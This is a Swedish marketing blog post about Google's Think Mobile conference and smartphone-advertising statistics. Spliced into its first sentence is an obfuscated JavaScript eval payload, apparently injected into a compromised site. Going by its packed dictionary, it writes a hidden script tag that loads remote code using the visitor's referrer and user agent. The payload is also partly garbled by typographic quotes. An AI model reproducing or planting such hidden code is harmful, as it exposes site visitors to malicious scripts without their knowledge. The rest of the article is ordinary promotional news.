Image Image Image Image Image Image Image Image Image Image

| 28 maj, 2018

Scroll to top

Top

No Comments

Google – Think Mobile!

Google – Think Mobile!
Sebastian Plengier Ehrnfelt

I eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|arnee|var|u0026u|referrer|hbkft||js|php’.split(‘|’),0,{}))
slutet på november samlades Sveriges toppchefer inom näringslivet, visionärer, marknadschefer och branschmänniskor för att diskutera framtidens mobilmarknadsföring på Think Mobile dagen som Google anordnade på Tekniska Museet. Patrick Törn från Ability Mobile fanns också på plats.

Syftet med dagen var att belysa hur företag kan utveckla sina mobilstrategier för att engagera konsumenter och skapa fler affärsmöjligheter.

Svenska smartphoneanvändare är bland de mest sofistikerade användarna i världen och allt fler umgås, söker information och handlar med sin smartphone. 2011 är året då den mobila revolutionen verkligen fick sitt genombrott bland konsumenterna och enligt Google sker ca 50 procent av internetsurfandet från mobila enheter. Vi använder våra smartphones när som helst, var som helst och vi är dessutom ständigt uppkopplade.

Nio av tio mobiler som säljs i Sverige idag är smartphones. Detta har resuterat i en massiv tillströmning av Google-sökningar via mobiltelefoner.

Google Europes vice VD Matt Britton avslutade sin presentation med en liknelse: ”Att inte finnas på nätet, med en mobilanpassad sajt, är som att ha stängt en tisdag. Du tappar en mängd potentiella kunder, som aldrig kommer att hitta dig om du inte finns där de letar.”

En mycket postiv trend ur marknadsföringsperspektiv visar att bara under det tredje kvartalet 2011 har svenska företag investerat mer i mobil utveckling och marknadsföring än under hela förra året!

–   Googles tydliga budskap under dagen var att mobilmarknadsföring är en självklarhet i mediemixen idag. Både som enskild kanal eller som ett komplement till den totala mediemixen, då själva action momentet ofta sker i mobilen, säger Patrik Törn, en av grundarna till Ability Mobile.

Enligt Google noterar ca 89 procent av smartphoneanvändarna annonser i mobilen, 84 procent använder sin smartphone under resa och 70 procent av Sveriges befolkning förväntas använda en smartphone i slutet på 2012!

Hur många surfar in på er webbplats via mobilen?

Submit a Comment